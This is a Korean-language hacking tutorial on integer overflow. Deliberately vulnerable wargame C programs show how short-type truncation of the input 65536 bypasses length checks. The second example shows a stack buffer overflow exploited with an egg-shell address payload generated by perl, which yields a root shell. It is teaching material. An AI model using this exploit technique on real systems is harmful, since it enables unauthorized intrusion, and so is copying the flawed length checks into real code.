/* 

homepage: http://beist.org 
e-mail: beist@hanmail.net 
msn: beist@hotmail.com 

beist와 관련된 사이트 : 
http://wowhacker.com (wowcode at wowhacker team) 
http://hackerschool.org (very good hacking portal site) 

*/ 


Integer overflow 가 위험한 이유. 

안녕하세요? phrack 60-10 의 Basic Integer Overflows (blexim) 문서를 읽고 조금 
부가 설명을 해보았습니다. 

integer overflow 는 변수의 범위에 에러를 일으키는 것을 말합니다. 컴퓨터 연산에서 
각 변수들은, 자기가 사용할 수 있는 범위가 있는데 사용자가 악의적으로 이 것을 조작 
하여 각 변수의 범위를 벗어난 크기를 세팅하려하면, 변수의 값이 예상 외의 값이 
나올 수가 있습니다. 

integer overflow 자체만으로는 시스템의 쉘을 따거나 하는 행위를 할 수 없습니다. 

integer overflow 공격이 성공하기 위해서는, integer overflow 의 가능성, 즉 특정 
변수를 마음대로 조작할 수 있는 것, 그리고 프로그램 알고리즘에 공격을 응용할 수 
있는 취약성이 존재해야합니다. 

먼저 간단한 wargame 문제를 만들어서 풀어보겠습니다. 

xx.c 

#include 
#include 

int main(int argc, char **argv) 
{ 
  unsigned short check; 
  int auth; 

  if(argc != 2) 
  { 
   printf("EX) %s int\n", argv[0]); 
   return -1; 
  } 

  auth = atoi(argv[1]); 
   
  check = auth; 

  if(check >= 10) 
  { 
   printf("check 에 걸렸음\n"); 
   return -1; 
  } 

  if(auth <= 30) 
  { 
   printf("auth 에 걸렸음\n"); 
   return -1; 
  } 

  printf("다음 레벨의 암호 : yeah!! beist!!\n"); 

  return 0; 
} 

위 문제에서 다음 레벨의 암호를 알아내보겠습니다. argv[1] 로 입력한 것은 
정수형으로 변환되어 auth 에 저장됩니다. auth 는 int 형인데, 이 것을 다시 
short 형인 check 에 담습니다. 

문제가 되는 부분은 이 부분입니다. check 의 범위는 최저 -32768 에서 최고 
32767 까지인데, unsigned 로 선언하면 65535 까지 표현할 수 있습니다. 반면에 
int 가 담을 수 있는 범위는 이보다 훨씬 위입니다. 

만약 이 범위를 벗어난 수치를 short 형 변수에 담으려고 하면 오류가 생기는데, 
이 것이 바로 integer overflow 의 핵심입니다. 이 것에 대한 자세한 부분은 
phrack 문서를 보시고 여기서는 그 내용에 대한 핵심이 되는 부분만을 문제 풀이로 
설명하겠습니다. 

먼저 첫번째 if(check >= 10) 인증을 우회하기 위해 check 변수를 10 보다 
작게 만들 필요가 있습니다. short 변수형에 큰 변수가 담기면 에러가 나는 
것을 이용해 short 의 한계치인 65535 을 넘어선 수치를 담아보겠습니다. 

다음과 같은 C 소스에서 테스트를 해보겠습니다. 

xx2.c 

int main(int argc, char **argv) 
{ 
unsigned short check; 
int auth; 

auth=atoi(argv[1]); 

check=auth; 

printf("결과 : %d\n", check); 
} 

[beist@hacking bof]$ ./xx2 655 
결과 : 655 
[beist@hacking bof]$ ./xx2 65536 
결과 : 0 
[beist@hacking bof]$ ./xx2 65537 
결과 : 1 

short 형 변수 check 에는 정상적인 값이 담기지 않을테지만 int 형 변수 
auth 의 값은 변하지 않을 것입니다. 왜냐면 int 형 변수는 65536 이상의 
수치를 담을 수 있기 때문에 short 형과는 달리 overflow 가 나지 않고 
정상적으로 처리되기 때문입니다. 

만약 65536 을 입력한다면, check 에는 0 이 담길 것이고 auth 에는 
65536 그대로 담기게 될 것입니다. 

결과적으로 다음 인증들은 각각 

if(check >= 10) 
-> if(0 >= 10) 

if(auth <= 30) 
-> if(65536 <= 30) 

이런 식으로 인증을 회피하고 마지막 printf 문을 통해 암호를 알아낼 수 
있을 것입니다. 

암호를 알아보겠습니다. 

[beist@hacking bof]$ ./xx 5 
auth 에 걸렸음 
[beist@hacking bof]$ ./xx 40 
check 에 걸렸음 
[beist@hacking bof]$ ./xx 65536 
다음 레벨의 암호 : yeah!! beist!! 


이제 integer overflow 를 이용하여 실제로 쉘을 딸 수 있는 간단한 예제에 
대해서 알아보겠습니다. 


wargame.c 

void function(char *str, int count) 
{ 
char buf[65000]; 

strncpy(buf, str, count); 

printf("result : %s\n"); 
} 

int main(int argc, char *argv[]) 
{ 
unsigned short check; 
int auth; 

  if(argc != 3) 
  { 
   printf("EX) %s int string\n", argv[0]); 
   return -1; 
  } 

auth=atoi(argv[1]); 

check=auth; 

if(check >= 65000) 
{ 
  printf("check 에 걸렸음\n"); 
  return -1; 
} 

function(argv[2], auth); 

} 


위 워게임 문제는, 사용자의 argv[1] 을 읽은 후에, 그 것을 정수형으로 변환하여 
auth 에 저장시킵니다. 그 것을 다시 short 형인 check 에 담고, 만약 check 의 
크기가 65000 이상이라면 인증에 걸려 프로그램을 종료시킵니다. 

인증을 거치는 이유는 function 함수에서 strncpy() 을 할 때, buf[] 크기 이상을 
strncpy() 함수의 인자로 사용하면 buf[] 크기 이상을 copy 하려하므로 overflow 
가 일어날 수도 있기 때문입니다. 

buf[] 의 크기는 65000 으로 선언 되어있으며 그래서 인증에 65000 이상의 
count 가 올 경우 프로그램 실행을 중지시킵니다. 위 알고리즘대로라면 사용자는 
65000 이상의 숫자를 입력할 수 없으므로 function() 함수에서 overflow 를 일으 
키기는 힘들 것 같습니다. 

하지만 short 형의 한계치 범위를 이용해 공격한다면 이 인증을 회피해 나갈수 
있습니다. 

xx.c 를 공격했던 것처럼 short 이상의 범위인 65536 을 입력하게 되면, 
인증은 다음과 같이 될 것입니다. 

if(check >= 65000) 
  -> if(0 >= 65000) 

그리고 function() 함수에는 다음과 같이 전달될 것입니다. 

functioin(argv[2], 65536); 

이렇게 되면 function() 함수가 strncpy() 를 수행할 때 buf[] 의 한계를 벗어난 
다음을 수행하게 될 것입니다. 

strncpy(buf, str, 65536); 

buf[] 의 한계인 65000 을 넘어선 copy 를 시도하게 되면, buf[] 의 영역을 벗어나게 
되고, 결국엔 sfp, ret 까지 덮어쓸 수 있게 됩니다. 

다음과 같은 방법으로 공격을 시도해보겠습니다. 

1. 쉘코드를 메모리에 올려놓는다. (egg shell) 
2. argv[1] 에 65536 을 입력한다. 
3. argv[2] 에 65536 만큼의 egg shell 의 주소를 입력한다. 
(주소값은 4 바이트를 차지하고 65536 만큼 입력하려면 4*16384 를 해야합니다.) 

[beist@beist bof]$ ./egg 
Using address: 0xbffffb18 
[beist@beist bof]$ ./wargame 65536 `perl -e 'print "\x18\xfb\xff\xbf"x16384'` 
result : 웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝웝옜好好好好 
好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好好 
.. 생략 .. 
.. 생략 .. 
.. 생략 .. 
好好好好好好好好好好好好好好好好好好好好好好好好好好好好好 
sh-2.05# 


위와 같이 쉘이 떨어졌습니다. buf[65000] 을 초과한 36 바이트가 거슬러 올라가 sfp, 
그리고 ret 영역까지 덮었고, 그 영역을 덮은 것은 argv[2], 즉 egg shell 의 주소가 
되므로, 쉘을 얻을 수 있었습니다. 

위 wargame 들은 integer overflow 를 공격할 수 있는 가장 간단한 방법입니다. 
위 경우들을 보시면 아시겠지만, 이 것이 만약 다른 상황이라면, 예를 들어 단순히 변수의 
overflow 만 일어나고 그 것이 프로그램의 진행에는 전혀 영향을 주지 않는 변수라면 
integer overflow 로 쉘을 따거나 하는 행위는 할 수 없을 것입니다. 쉽게 설명하자면 
우리가 overflow 를 일으킬 수 있는 변수가 프로그램에서 중요한 부분을 차지하는 
변수가 아니라면 단순히 integer overflow 만을 일으키는 행위에서 그칠 것입니다. 

integer overflow 에 대해서 간단히 알아보았습니다. 

그럼 이만..